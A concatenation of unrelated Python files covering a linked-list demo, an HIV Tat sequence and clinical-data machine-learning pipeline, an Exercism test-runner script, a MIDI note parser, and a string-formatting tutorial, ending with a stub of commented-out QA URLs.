        prev.next_val = current.next_val
        current = None
# Demo: build Mon -> Tue -> Wed, then exercise each mutator.
list1 = LinkedList()
list1.head_val = Node("Mon")
e2 = Node("Tue")
e3 = Node("Wed")
list1.head_val.next_val = e2
e2.next_val = e3
list1.at_begin("Sun")    # Sun Mon Tue Wed
list1.at_end("Fri")      # ... Wed Fri
list1.in_between(list1.head_val.next_val, "Thu")  # insert after Mon
list1.remove_node("Mon")
list1.list_print()       # prints: Sun Thu Tue Wed Fri
|
#!/usr/bin/env python
'''
This file defines functions for NGS Tat analysis pipeline
'''
from __future__ import division
import pandas as pd
import numpy as np
from collections import Counter
import itertools
from scipy import interp
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn.cross_validation import StratifiedKFold
from sklearn.cross_validation import cross_val_score
from sklearn.preprocessing import scale
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rc('font',family='Arial')  # use Arial for all matplotlib text
##################################################################
def plot_histogram(DF, feature, xlabel, savepath):
    """Plot and save a histogram of DF[feature] with a dashed cutoff at 0.5.

    Parameters: DF (DataFrame), feature (column name), xlabel (x-axis
    label), savepath (output figure path, saved at 300 dpi).
    """
    fig, ax = plt.subplots(figsize=(6, 4))
    ax.hist(DF[feature])
    ax.set_xlabel(xlabel, size=16, fontweight='bold')
    ax.set_ylabel('Number of Samples', size=16, fontweight='bold')
    # set_axis_bgcolor was removed in matplotlib >= 3.0; set_facecolor is
    # the supported replacement (same effect).
    ax.set_facecolor('white')
    for side in ('left', 'bottom'):
        ax.spines[side].set_visible(True)
        ax.spines[side].set_color('black')
        ax.spines[side].set_linewidth(2)
    # Dashed vertical line marking the GDS impairment threshold.
    ax.axvline(x=0.5, ymin=0, ymax=30, linewidth=2, color='k', ls='--')
    ax.tick_params(axis='x', labelsize=14)
    ax.tick_params(axis='y', labelsize=14, length=5)
    ax.yaxis.tick_left()
    plt.show()
    fig.tight_layout()
    fig.savefig(savepath, dpi=300)
def split_df_by_impairment(DF, gds_score):
    """Partition DF into (impaired, nonimpaired) frames by GDS >= gds_score."""
    mask = DF.GDS >= gds_score
    return DF[mask], DF[~mask]
def plot_clinical_boxplots(DF, impaired_df, nonimpaired_df, savepath):
    """Draw a 2x3 grid of boxplots comparing the impaired vs nonimpaired
    groups on six clinical parameters, then save to *savepath*."""
    fig,ax = plt.subplots(2,3,figsize=(12,6))
    # Column names in DF and the matching human-readable panel titles.
    clin_cols = ['CD4','log10_VL','CD8','nCD4','log10_pVL','nCD8']
    plot_titles = ['CD4 count','Log10(Viral Load)','CD8 count',
                   'nadir CD4','log10(peak VL)','nadir CD8']
    # (x, y) walk the 2x3 grid; t indexes the title list.
    x,y,t = 0,0,0
    for feature in DF[clin_cols]:
        impaired_list = list(impaired_df[feature])
        nonimpaired_list = list(nonimpaired_df[feature])
        ax[x,y].tick_params(axis='x', labelsize=14)
        ax[x,y].tick_params(axis='y', labelsize=14, length=5)
        ax[x,y].yaxis.tick_left()
        ax[x,y].set_title(plot_titles[t], size=18)
        ax[x,y].set_xticklabels('')
        ax[x,y].boxplot([impaired_list, nonimpaired_list])
        # formatting
        ax[x,y].spines['left'].set_visible(True)
        ax[x,y].spines['left'].set_color('black')
        ax[x,y].spines['left'].set_linewidth(2)
        ax[x,y].spines['bottom'].set_visible(True)
        ax[x,y].spines['bottom'].set_color('black')
        ax[x,y].spines['bottom'].set_linewidth(2)
        # NOTE(review): set_axis_bgcolor was removed in matplotlib >= 3.0;
        # use set_facecolor when upgrading.
        ax[x,y].set_axis_bgcolor('white')
        t += 1
        # Only the bottom row shows the group labels.
        if x==1:
            ax[x,y].set_xticklabels(['Impaired', 'Nonimpaired'], size=16)
        else:
            ax[x,y].set_xticklabels(['', ''])
        #update x and y coordinates
        if y!=2:
            y+=1
        else:
            y=0
            x+=1
    ax[0,1].set_ylabel('cells')
    plt.show()
    fig.tight_layout()
    fig.savefig(savepath, dpi=300)
####################################################################
def select_dataframe_columns(df, columns):
    '''Return *df* restricted to *columns*, in the order given.'''
    subset = df[columns]
    return subset
def shuffle_dataframe(df):
    '''Return the rows of *df* in random order (shape and index labels kept).'''
    shuffled = df.sample(frac=1)
    return shuffled
def target_feature_split(df, target, features):
    '''Return (flattened target values, feature sub-frame) from *df*.'''
    y = np.ravel(df[target])
    X = df[features]
    return y, X
def scale_dataframe(df):
    '''Standardize every column of *df* (zero mean, unit variance) and
    return a new DataFrame with the original column names.'''
    standardized = pd.DataFrame(scale(df))
    standardized.columns = df.columns
    return standardized
def threshold_target(target, threshold):
    '''Binarize a continuous target: 1 where value >= threshold, else 0.'''
    flags = [1 if value >= threshold else 0 for value in target]
    return np.ravel(flags)
def run_preparation_pipeline(df, features, target, threshold):
    '''Split target from features, dummy-encode, scale, and binarize.

    Fix: the original ignored its *target* and *threshold* parameters and
    hard-coded 'GDS' / 0.5. Existing callers pass exactly those values, so
    their results are unchanged.
    '''
    y_raw, feature_df = target_feature_split(df, target, features)
    feature_df = pd.get_dummies(feature_df, drop_first=True)
    X_df = scale_dataframe(feature_df)
    y = threshold_target(y_raw, threshold)
    return X_df, y
def run_preparation_pipeline2(df, features, target, threshold):
    '''Like run_preparation_pipeline but without feature scaling.

    Fix: honors *target* and *threshold* instead of the previous
    hard-coded 'GDS' / 0.5 (callers already pass those values).
    '''
    y_raw, feature_df = target_feature_split(df, target, features)
    X_df = pd.get_dummies(feature_df, drop_first=True)
    y = threshold_target(y_raw, threshold)
    return X_df, y
def run_genetic_preparation_pipeline(df, features, target, threshold):
    '''Prepare genetic features: dummy-encode and binarize the target.

    NOTE: currently identical to run_preparation_pipeline2; kept as a
    separate entry point for genetic data. Fix: honors *target* and
    *threshold* instead of the previous hard-coded 'GDS' / 0.5.
    '''
    y_raw, feature_df = target_feature_split(df, target, features)
    X_df = pd.get_dummies(feature_df, drop_first=True)
    y = threshold_target(y_raw, threshold)
    return X_df, y
####################################################################
def get_covariate_matrix(DF, features, target, threshold, savepath):
    """Plot and save a heatmap of pairwise correlations between the
    prepared (dummy-encoded, scaled) clinical covariates."""
    # Pretty display names for the heatmap axes.
    label_dict = {'CD4':'CD4 count', 'Age':'Age','log10_VL':'log10 VL',
                  'Gender_Male':'Gender','nCD8':'nadir CD8','CD8':'CD8 count',
                  'nCD4':'nadir CD4', 'log10_pVL':'log10 peak VL'}
    X, y = run_preparation_pipeline(DF, features, target, threshold)
    # NOTE(review): the `if c in label_dict` filter shrinks the name list
    # but not X itself, so any column missing from label_dict would cause a
    # length-mismatch on assignment — confirm features always map.
    X.columns = [label_dict[c] for c in X.columns if c in list(label_dict.keys())]
    plt.figure(figsize=(6, 6))
    sns.set(font_scale=1.5)
    sns.heatmap(X.corr(), square=True)
    plt.tight_layout()
    plt.savefig(savepath, dpi=300)
    plt.show()
##################################################################
def threshold_converter(old_df, new_df, column, threshold):
    """Add *column* to new_df as 0/1 flags for old_df[column] > threshold."""
    exceeds = old_df[column] > threshold
    new_df[column] = exceeds.astype(int)
    return new_df
def make_threshold_dataframe(genetic_df, threshold):
    """Binarize every variant column (all but the first) of genetic_df at
    *threshold*, then return GDS followed by the binarized columns."""
    binary_df = pd.DataFrame()
    for col in genetic_df.columns[1:]:
        binary_df = threshold_converter(genetic_df, binary_df, col, threshold)
    binary_df['GDS'] = genetic_df['GDS']
    ordered = ['GDS'] + list(genetic_df.columns[1:])
    return binary_df[ordered]
def get_consensus_df(g_df):
    '''Collapse each 20-column amino-acid block into the single
    highest-valued residue per row, giving one consensus letter per
    sequence position.

    Assumes column 0 is 'GDS' followed by 101 positions x 20 residue
    columns named '<position><residue letter>' — TODO confirm against the
    upstream data layout.
    '''
    all_max = []
    # For each block of 20 columns, record the per-row argmax column name.
    for i in range(1, g_df.shape[1], 20):
        pos_idx = range(i,i+20,1)
        pos_list = list(g_df.columns[pos_idx])
        pos_df = g_df[pos_list]
        all_max.append(list(pos_df.idxmax(axis=1)))
    consensus_dict = {}
    # Strip the trailing residue letter to get the position key; keep the
    # letter itself as the per-sample consensus value.
    for L in all_max:
        p = L[0][:-1]
        consensus_dict[p] = []
        for variant in L:
            consensus_dict[p].append(variant[-1])
    df_new = pd.DataFrame(consensus_dict)
    df_new['GDS'] = g_df['GDS']
    # Reorder as GDS followed by positions 1..101.
    sorted_cols = ['GDS'] + [str(i+1) for i in range(101)]
    return df_new[sorted_cols]
def get_pI_df(con_df):
    """Replace each consensus residue letter with its isoelectric point (pI).

    Non-residue cells (e.g. the GDS column) are left untouched by
    DataFrame.replace.
    """
    # pI per amino acid, one-letter codes, alphabetical order.
    aa_pi_dict = {
        'A': 6.00, 'C': 5.07, 'D': 2.77, 'E': 3.22, 'F': 5.48,
        'G': 5.97, 'H': 7.59, 'I': 6.02, 'K': 9.74, 'L': 5.98,
        'M': 5.74, 'N': 5.41, 'P': 6.30, 'Q': 5.65, 'R': 10.76,
        'S': 5.68, 'T': 5.60, 'V': 5.96, 'W': 5.89, 'Y': 5.66,
    }
    return con_df.replace(to_replace=aa_pi_dict)
##################################################################
def get_CV_metrics(model, X, y, folds):
    '''Cross-Validation with many metrics.

    Runs stratified k-fold CV for a coefficient-bearing classifier and
    returns a dict with per-fold AUC/precision/recall/F1/coefficients, the
    per-fold ROC curves, and the interpolated mean ROC curve.

    NOTE(review): uses sklearn.cross_validation.StratifiedKFold — that
    module was removed in scikit-learn 0.20; migrate to
    sklearn.model_selection when upgrading.
    '''
    roc_aucs, precisions, recalls, f1s = [], [], [], []
    FPRs, TPRs = [], []
    mean_tpr = 0.0
    mean_fpr = np.linspace(0, 1, 100)  # common grid for TPR interpolation
    coefs = []
    # 5-fold cross-validation
    kf = StratifiedKFold(y, n_folds=folds)
    for train_index, test_index in kf:
        X_train, X_test = X.iloc[train_index], X.iloc[test_index]
        Y_train, Y_test = y[train_index], y[test_index]
        # NOTE(review): the model is fit twice per fold (once per call);
        # predictions and probabilities come from separate fits.
        mod_prediction = model.fit(X_train, Y_train).predict(X_test)
        mod_probability = model.fit(X_train, Y_train).predict_proba(X_test)
        # metrics
        fpr, tpr, thresholds = metrics.roc_curve(Y_test, mod_probability[:, 1])
        roc_auc = metrics.roc_auc_score(Y_test, mod_probability[:,1])
        precision = metrics.precision_score(Y_test, mod_prediction)
        recall = metrics.recall_score(Y_test, mod_prediction)
        f1 = metrics.f1_score(Y_test, mod_prediction)
        coef = model.coef_
        # append fold metrics
        FPRs.append(fpr)
        TPRs.append(tpr)
        roc_aucs.append(round(roc_auc,2))
        precisions.append(round(precision,2))
        recalls.append(round(recall,2))
        f1s.append(round(f1,2))
        coefs.append(coef)
        #coefs.append(coef[0])
        # mean calculations
        mean_tpr += interp(mean_fpr, fpr, tpr)
        mean_tpr[0] = 0.0
    mean_tpr /= folds
    mean_tpr[-1] = 1.0
    mean_auc = metrics.auc(mean_fpr, mean_tpr)
    d = {'AUC':roc_aucs, 'Precision':precisions, 'Recall':recalls, 'F1':f1s, 'Coef':coefs,
         'FPRs':FPRs, 'TPRs':TPRs, 'meanTPR':mean_tpr, 'meanFPR':mean_fpr}
    return d
def get_RF_CV_metrics(model, X, y, folds):
    '''Cross-Validation with many metrics.

    Variant of get_CV_metrics for models without a ``coef_`` attribute
    (e.g. random forests) — otherwise a near-duplicate; consider merging.

    NOTE(review): depends on the removed sklearn.cross_validation module
    (dropped in scikit-learn 0.20).
    '''
    roc_aucs, precisions, recalls, f1s = [], [], [], []
    FPRs, TPRs = [], []
    mean_tpr = 0.0
    mean_fpr = np.linspace(0, 1, 100)  # common grid for TPR interpolation
    # 5-fold cross-validation
    kf = StratifiedKFold(y, n_folds=folds)
    for train_index, test_index in kf:
        X_train, X_test = X.iloc[train_index], X.iloc[test_index]
        Y_train, Y_test = y[train_index], y[test_index]
        mod_prediction = model.fit(X_train, Y_train).predict(X_test)
        mod_probability = model.fit(X_train, Y_train).predict_proba(X_test)
        # metrics
        fpr, tpr, thresholds = metrics.roc_curve(Y_test, mod_probability[:, 1])
        roc_auc = metrics.roc_auc_score(Y_test, mod_probability[:,1])
        precision = metrics.precision_score(Y_test, mod_prediction)
        recall = metrics.recall_score(Y_test, mod_prediction)
        f1 = metrics.f1_score(Y_test, mod_prediction)
        # append fold metrics
        FPRs.append(fpr)
        TPRs.append(tpr)
        roc_aucs.append(round(roc_auc,2))
        precisions.append(round(precision,2))
        recalls.append(round(recall,2))
        f1s.append(round(f1,2))
        #coefs.append(coef[0])
        # mean calculations
        mean_tpr += interp(mean_fpr, fpr, tpr)
        mean_tpr[0] = 0.0
    mean_tpr /= folds
    mean_tpr[-1] = 1.0
    mean_auc = metrics.auc(mean_fpr, mean_tpr)
    d = {'AUC':roc_aucs, 'Precision':precisions, 'Recall':recalls, 'F1':f1s,
         'FPRs':FPRs, 'TPRs':TPRs, 'meanTPR':mean_tpr, 'meanFPR':mean_fpr}
    return d
def metrics_wrapper(df, model, f, folds):
    """Shuffle *df*, prepare the standard clinical feature set, and
    cross-validate *model* on feature subset *f*; returns the metrics dict."""
    features = ['Age', 'Gender', 'log10_VL', 'log10_pVL', 'CD4', 'nCD4',
                'CD8', 'nCD8', 'TMHDS']
    shuffled = shuffle_dataframe(df)
    X_df, y = run_preparation_pipeline(shuffled, features, 'GDS', 0.5)
    return get_CV_metrics(model, X_df[f], y, folds)
def metrics_wrapper_random(df, model, f, folds):
    """Same as metrics_wrapper, but with labels randomly permuted —
    gives a null-distribution baseline for the CV metrics."""
    features = ['Age', 'Gender', 'log10_VL', 'log10_pVL', 'CD4', 'nCD4',
                'CD8', 'nCD8', 'TMHDS']
    shuffled = shuffle_dataframe(df)
    X_df, y = run_preparation_pipeline(shuffled, features, 'GDS', 0.5)
    y_rand = np.random.permutation(y)
    return get_CV_metrics(model, X_df[f], y_rand, folds)
####################################################################
def filter_genetic_variants(genetic_df, a, b):
    """Keep 'GDS' plus variant columns where the fraction of values
    greater than *a* exceeds *b*; the first 60 variant columns
    (columns 1..60) are always dropped afterwards."""
    def _passes(col):
        hits = sum(genetic_df[col] > a)
        return (hits / len(genetic_df[col])) > b

    keep_cols = ['GDS'] + [c for c in genetic_df.columns[1:] if _passes(c)]
    excluded = set(genetic_df.columns[1:61])
    keep_cols = [c for c in keep_cols if c not in excluded]
    return genetic_df[keep_cols]
|
#!/usr/bin/env python3
"""Meant to be run from inside python-test-runner container,
where this track repo is mounted at /python
"""
import argparse
from functools import wraps
from itertools import zip_longest
import json
from pathlib import Path
import shutil
import subprocess
import sys
import tempfile
from typing import List
from data import Config, ExerciseConfig, ExerciseInfo, ExerciseStatus
# Exercises whose canonical tests are too slow to run with skips stripped.
ALLOW_SKIP = ['alphametics', 'largest-series-product']
# Present when running inside the python-test-runner image.
TEST_RUNNER_DIR = Path('/opt/test-runner')
# name -> runner function; populated by the @runner decorator below.
RUNNERS = {}
def runner(name):
    """Decorator factory: register the decorated function in RUNNERS under
    *name* and return a signature-preserving forwarding wrapper.

    Note the UNdecorated function is what gets registered.
    """
    def _decorator(func):
        RUNNERS[name] = func

        @wraps(func)
        def _forward(exercise: ExerciseInfo, workdir: Path, quiet: bool = False):
            return func(exercise, workdir, quiet=quiet)
        return _forward
    return _decorator
def copy_file(src: Path, dst: Path, strip_skips=False):
    """Copy *src* to *dst*; with strip_skips, drop '@unittest.skip' lines."""
    if not strip_skips:
        shutil.copy2(src, dst)
        return
    with src.open('r') as fin:
        kept = [ln for ln in fin.readlines()
                if not ln.strip().startswith('@unittest.skip')]
    with dst.open('w') as fout:
        fout.writelines(kept)
def copy_solution_files(exercise: ExerciseInfo, workdir: Path, exercise_config: ExerciseConfig = None):
    """Copy editor helpers and solution-position files into *workdir*.

    When both a solution file and an exemplar file exist at a position, the
    exemplar's CONTENT is written to the solution file's relative path, so
    the tests run against the known-good implementation.
    """
    if exercise_config is not None:
        solution_files = exercise_config.files.solution
        exemplar_files = exercise_config.files.exemplar
        helper_files = exercise_config.files.editor
    else:
        solution_files = []
        exemplar_files = []
        helper_files = []
    if helper_files:
        helper_files = [exercise.path / h for h in helper_files]
        for helper_file in helper_files:
            dst = workdir / helper_file.relative_to(exercise.path)
            copy_file(helper_file, dst)
    # Fall back to the conventional stub/exemplar locations when the config
    # does not list them explicitly.
    if not solution_files:
        solution_files.append(exercise.solution_stub.name)
    solution_files = [exercise.path / s for s in solution_files]
    if not exemplar_files:
        exemplar_files.append(exercise.exemplar_file.relative_to(exercise.path))
    exemplar_files = [exercise.path / e for e in exemplar_files]
    # zip_longest: unmatched entries are copied under their own names.
    for solution_file, exemplar_file in zip_longest(solution_files, exemplar_files):
        if solution_file is None:
            copy_file(exemplar_file, workdir / exemplar_file.name)
        elif exemplar_file is None:
            copy_file(solution_file, workdir / solution_file.name)
        else:
            # Exemplar content under the solution's filename (see docstring).
            dst = workdir / solution_file.relative_to(exercise.path)
            copy_file(exemplar_file, dst)
def copy_test_files(exercise: ExerciseInfo, workdir: Path, exercise_config = None):
    """Copy the exercise's test files (and editor helpers) into *workdir*,
    stripping @unittest.skip markers unless the exercise is in ALLOW_SKIP."""
    if exercise_config is not None:
        test_files = exercise_config.files.test
        helper_files = exercise_config.files.editor
    else:
        test_files = []
        helper_files = []
    if helper_files:
        for helper_file_name in helper_files:
            helper_file = exercise.path / helper_file_name
            helper_file_out = workdir / helper_file_name
            copy_file(helper_file, helper_file_out, strip_skips=(exercise.slug not in ALLOW_SKIP))
    # Fall back to the conventional test file when the config lists none.
    if not test_files:
        test_files.append(exercise.test_file.name)
    for test_file_name in test_files:
        test_file = exercise.path / test_file_name
        test_file_out = workdir / test_file_name
        copy_file(test_file, test_file_out, strip_skips=(exercise.slug not in ALLOW_SKIP))
def copy_exercise_files(exercise: ExerciseInfo, workdir: Path):
    """Stage an exercise's config, solution and test files into *workdir*."""
    config = None
    if exercise.config_file.is_file():
        # Recreate the .meta directory so the test runner finds the config.
        meta_dir = workdir / '.meta'
        meta_dir.mkdir(exist_ok=True)
        copy_file(exercise.config_file, meta_dir / exercise.config_file.name)
        config = exercise.load_config()
    copy_solution_files(exercise, workdir, config)
    copy_test_files(exercise, workdir, config)
@runner('pytest')
def run_with_pytest(_exercise, workdir, quiet: bool = False) -> int:
    """Run pytest in *workdir*; return its exit code (0 == all passed)."""
    run_kwargs = {'cwd': str(workdir)}
    if quiet:
        run_kwargs.update(stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    completed = subprocess.run([sys.executable, '-m', 'pytest'], **run_kwargs)
    return completed.returncode
@runner('test-runner')
def run_with_test_runner(exercise, workdir, quiet: bool = False) -> int:
    """Run the exercism test-runner against *workdir*.

    Uses the locally installed runner at TEST_RUNNER_DIR when present,
    otherwise falls back to docker-compose. Returns 0 when the produced
    results.json reports 'pass', 1 otherwise (including no results file).
    """
    kwargs = {}
    if quiet:
        kwargs['stdout'] = subprocess.DEVNULL
        kwargs['stderr'] = subprocess.DEVNULL
    if TEST_RUNNER_DIR.is_dir():
        # Inside the test-runner image: invoke the runner directly.
        kwargs['cwd'] = str(TEST_RUNNER_DIR)
        args = ['./bin/run.sh', exercise.slug, workdir, workdir]
    else:
        # Outside the image: mount workdir into a one-off container.
        args = [
            'docker-compose',
            'run',
            '-w', str(TEST_RUNNER_DIR),
            '--entrypoint', './bin/run.sh',
            '-v', f'{workdir}:/{exercise.slug}',
            'test-runner',
            exercise.slug,
            f'/{exercise.slug}',
            f'/{exercise.slug}',
        ]
    subprocess.run(args, **kwargs)
    # The runner communicates through results.json rather than exit codes.
    results_file = workdir / 'results.json'
    if results_file.is_file():
        with results_file.open() as f:
            results = json.load(f)
        if results['status'] == 'pass':
            return 0
    return 1
def check_assignment(exercise: ExerciseInfo, runner: str = 'pytest', quiet: bool = False) -> int:
    """Stage *exercise* into a temp dir and execute it with the named runner;
    returns the runner's exit status (0 == success)."""
    with tempfile.TemporaryDirectory(exercise.slug) as tmp:
        workdir = Path(tmp)
        copy_exercise_files(exercise, workdir)
        return RUNNERS[runner](exercise, workdir, quiet=quiet)
def get_cli() -> argparse.ArgumentParser:
    """Build the command-line parser; exits early if no runner is registered."""
    registered = list(RUNNERS.keys())
    if not registered:
        print('No runners registered!')
        raise SystemExit(1)
    parser = argparse.ArgumentParser()
    parser.add_argument('-q', '--quiet', action='store_true')
    parser.add_argument('--deprecated', action='store_true', help='include deprecated exercises', dest='include_deprecated')
    parser.add_argument('--wip', action='store_true', help='include WIP exercises', dest='include_wip')
    parser.add_argument('-r', '--runner', choices=registered, default=registered[0])
    parser.add_argument('exercises', nargs='*')
    return parser
def main():
    """Entry point: select exercises per CLI options, run each, report failures."""
    opts = get_cli().parse_args()
    config = Config.load()
    status_filter = {ExerciseStatus.Active, ExerciseStatus.Beta}
    if opts.include_deprecated:
        status_filter.add(ExerciseStatus.Deprecated)
    if opts.include_wip:
        status_filter.add(ExerciseStatus.WIP)
    exercises = config.exercises.all(status_filter)
    if opts.exercises:
        # test specific exercises
        exercises = [e for e in exercises if e.slug in opts.exercises]
        not_found = [
            slug for slug in opts.exercises
            if not any(e.slug == slug for e in exercises)
        ]
        if not_found:
            # BUG FIX: the old inner check `slug not in exercises` compared a
            # str against ExerciseInfo objects and was therefore always true;
            # not_found already holds exactly the slugs to report.
            for slug in not_found:
                print(f"unknown or disabled exercise '{slug}'")
            raise SystemExit(1)
    # BUG FIX: was sys.executable.capitalize(), which mangled the path's case.
    print(f'TestEnvironment: {sys.executable}')
    print(f'Runner: {opts.runner}\n\n')
    failures = []
    for exercise in exercises:
        print('# ', exercise.slug)
        if not exercise.test_file:
            print('FAIL: File with test cases not found')
            failures.append('{} (FileNotFound)'.format(exercise.slug))
        elif check_assignment(exercise, runner=opts.runner, quiet=opts.quiet):
            failures.append('{} (TestFailed)'.format(exercise.slug))
        print('')
    if failures:
        print('FAILURES: ', ', '.join(failures))
        raise SystemExit(1)
    print('SUCCESS!')
# Script entry point: only run when executed directly, not on import.
if __name__ == "__main__":
    main()
|
import mido
class Msg:
    """One simplified MIDI note event.

    velocity > 0 means note-down; velocity == 0 means note-up.
    """

    def __init__(self, T=0, c=0, n=0, v=0):
        self.track = T      # originating track (always 0 in load())
        self.channel = c    # MIDI channel
        self.note = n       # MIDI note number
        self.velocity = v   # 0 = note-off, >0 = note-on

    def __repr__(self):
        # Added for debuggability; callers elsewhere print fields by hand.
        return f'Msg(T={self.track}, c={self.channel}, n={self.note}, v={self.velocity})'
class Msgs:
    """Ordered collection of Msg events that share one tick."""

    def __init__(self):
        self.msgs = []

    def append(self, newMsg):
        self.msgs.append(newMsg)

    def hasMsgDown(self, channel, note, beside=None):
        """True if a note-down (velocity > 0) other than *beside* matches
        the given channel and note."""
        return any(
            m.channel == channel and m.note == note and m.velocity > 0 and m != beside
            for m in self.msgs
        )
class MsgListItem:
    """All MIDI messages that fall on one quantized tick."""
    def __init__(self):
        self.tick = 0  # quantized time position (set by MsgList.findByTick)
        self.msgs = Msgs()  # events occurring at this tick
class MsgList:
    """Time-indexed table of MIDI messages, keyed by quantized tick."""

    def __init__(self):
        # The final message table to be saved.
        self.msgList = []

    def findByTick(self, tick):
        """Return the item for *tick*, creating and registering it if absent."""
        for item in self.msgList:
            if item.tick == tick:
                return item
        # No such entry yet: create one.
        newItem = MsgListItem()
        newItem.tick = tick
        self.msgList.append(newItem)
        return newItem

    def fixForShortNote(self, item):
        """Move a note-up that coincides with its own note-down one tick later.

        BUG FIX: iterate over a snapshot of the list -- removing elements
        from the list being iterated skips the element after each removal.
        """
        for msg in list(item.msgs.msgs):
            if msg.velocity == 0 and item.msgs.hasMsgDown(channel=msg.channel, note=msg.note):
                tick = item.tick + 1
                self.findByTick(tick).msgs.append(msg)
                item.msgs.msgs.remove(msg)

    def fixForOverLapNote(self, item):
        """Move a note-up that overlaps a new note-down one tick earlier.

        BUG FIX: iterate over a snapshot (see fixForShortNote).
        """
        for msg in list(item.msgs.msgs):
            if msg.velocity == 0 and item.msgs.hasMsgDown(channel=msg.channel, note=msg.note):
                tick = item.tick - 1
                self.findByTick(tick).msgs.append(msg)
                item.msgs.msgs.remove(msg)

    def fixForRepeatNote(self, item):
        """Drop duplicate note-downs for the same channel/note at one tick.

        BUG FIX: iterate over a snapshot (see fixForShortNote).
        """
        for msg in list(item.msgs.msgs):
            if msg.velocity > 0 and item.msgs.hasMsgDown(channel=msg.channel, note=msg.note, beside=msg):
                item.msgs.msgs.remove(msg)

    def sortByTick(self):
        self.msgList.sort(key=lambda item: item.tick)

    def load(self, file, tickrate=20.0, restrict=0):
        """Read *file* with mido, quantize note events to ticks of
        1/tickrate seconds each, and populate self.msgList (sorted)."""
        mid = mido.MidiFile(file)
        currentTime = 0.0
        currentTick = 0
        lastChannel, lastNote = -1, -1
        for msg in mid:
            if msg.is_meta:
                if msg.time > 0:
                    currentTime += msg.time
            elif msg.type == 'note_on' or msg.type == 'note_off':
                # Skip a zero-velocity event that immediately repeats the
                # previous channel/note (redundant note-off).
                if msg.time == 0 and lastChannel == msg.channel and lastNote == msg.note and msg.velocity == 0:
                    continue
                lastChannel, lastNote = msg.channel, msg.note
                currentTime += msg.time
                m = {
                    'track'   : 0, #msg.track,
                    'channel' : msg.channel,
                    'note'    : msg.bytes()[1],
                    'velocity': 0 if msg.type == 'note_off' else msg.bytes()[2],
                }
                newMsg = Msg(m['track'], m['channel'], m['note'], m['velocity'])
                toTick = int(round(currentTime / (1 / tickrate)))
                item = self.findByTick(toTick)
                item.msgs.append(newMsg)
                if newMsg.velocity > 0:
                    self.fixForOverLapNote(item)
                    self.fixForRepeatNote(item)
                else:
                    self.fixForShortNote(item)
        self.sortByTick()
if __name__ == '__main__':
    # Demo: load a MIDI file at 68/5 ticks per second and dump note-downs.
    msgList = MsgList()
    msgList.load(f'./mid/阴天快乐debug.mid', 68.0 / 5)
    for item in msgList.msgList:
        print(f'tick: {item.tick}')
        for msg in item.msgs.msgs:
            if msg.velocity > 0:
                print(f'    msg: {msg.track} {msg.channel} {msg.note} {msg.velocity}')
|
'''
Source : https://pyformat.info/
'''
# single symbol multiline comment control
'''
# just alignment
print('{0:>7}'.format('zip','hello'))
print('{1:<7}'.format('zip','hello'))
print('{1:^7}'.format('zip','hello'))
# text is left align by default
print('{0:10}'.format("hello"))
# numbers are right align
print('{0:10f}'.format(3.141592653589793))
# with padding
print('{0:*>7}'.format('zip'))
print('{0:*<7}'.format('zip'))
print('{0:*^7}'.format('zip'))
#'''
'''
# Truncating
print('{0:.5}'.format('xylophone'))
# decimal places
print('{0:.5f}'.format(4.2))
print('{0:.5f}'.format(4.2453142352))
# Truncating and padding
# {<positional-argument>:<padding><alignment><width>.<truncating> }
print('{0:*^12.5}'.format('xylophone'))
# whole string limit
print('{0:*^12.5}'.format(1234.567))
# decimal places
print('{0:*^12.5f}'.format(1234.567))
#'''
'''
# Numbers
# text is left align by default
print('{0:10}'.format("hello"))
# numbers are right align
print('{0:10f}'.format(3.141592653589793))
# Plain 'f' applies the default width/alignment, since no width is given
print('{0:f}'.format(3.141592653589793))
print('{0:.10f}'.format(3.141592653589793))
# padding numbers
# auto padded with space
print('{:4d}'.format(42))
# padding with zero
print('{:04d}'.format(42))
print('{:010d}'.format(42))
# padding with numbers and float
print('{:06.2f}'.format(3.141592653589793))
#'''
'''
Just perfect-
For integer values providing a precision doesn't make much sense
and is actually forbidden in the new style (it will result in a ValueError).
'''
'''
# signed numbers
print('{:+d}'.format((- 23)))
print('{:+d}'.format((23)))
# New style formatting is also able to control the position of the sign
# symbol relative to the padding.
# digit will come in width 5
print('{:=+5d}'.format(-23))
print('{:=+5d}'.format(23))
#'''
'''
# name placeholders
print('{first} {last}'.format(first='Hodor', last='Hodor!'))
# with data
data = {'first': 'Hodor', 'last': 'Hodor!'}
print('{first} {last}'.format(**data))
# Getitem and Getattr
person = {'first': 'Jean-Luc', 'last': 'Picard'}
print('{p[first]} {p[last]}'.format(p=person))
data = [4, 8, 15, 16, 23, 42]
print('{d[4]} {d[5]}'.format(d=data))
# even with class- super cool
class Plant(object):
type = 'tree'
kinds = [{'name': 'oak'}, {'name': 'maple'}]
print('{p.type}'.format(p=Plant()))
print('{p.type}: {p.kinds[0][name]}'.format(p=Plant()))
#'''
'''
# THE NEXT BIG THING
# Parametrized formats
# Parametrized alignment and width:
print('{:{align}{width}}'.format('test', align='^', width='10'))
#Parametrized precision:
print('{:.{prec}} = {:.{prec}f}'.format('Gibberish', 2.7182, prec=3))
print('{1:.{prec}} = {1:.{prec}f}'.format('Gibberish', 2.7182, prec=3))
# width and precision
print('{:{width}.{prec}f}'.format(2.7182, width=5, prec=2))
# notice the minor change
print('{:{prec}} = {:{prec}}'.format('Gibberish', 2.7182, prec='.3'))
# with numbers - positional arguments
print('{:{}{}{}.{}}'.format(2.7182818284, '>', '+', 10, 3))
# mixed with keyword arguments
print('{:{}{sign}{}.{}}'.format(2.7182818284, '>', 10, 3, sign='+'))
#'''
'''
from datetime import datetime
print('{:%Y-%m-%d %H:%M}'.format(datetime(2001, 2, 3, 4, 5)))
# parameterized date and time
dt = datetime(2001, 2, 3, 4, 5)
print('{:{dfmt} {tfmt}}'.format(dt, dfmt='%Y-%m-%d', tfmt='%H:%M'))
#'''
#'''
# The date time works because of __format__() method
# For custom objects - INSANELY AWESOME
class MYCLASS(object):
    """Demonstrates custom format-spec handling via __format__."""

    def __format__(self, format):
        # Any spec other than the magic phrase yields the fallback text.
        if format != 'open-the-pod-bay-doors':
            return 'Invalid format'
        return "I'm afraid I can't do that."

print('{:open-the-pod-bay-doors}'.format(MYCLASS()))
print('{:some-invalid-format}'.format(MYCLASS()))
|
__author__ = 'sandeeps'

# Older environment endpoints kept for reference:
#application_url = "https://commcareqa.tangoe.com/manage/login/login.trq"
#application_url = "https://qa5.traq.com/manage/login/login.trq"
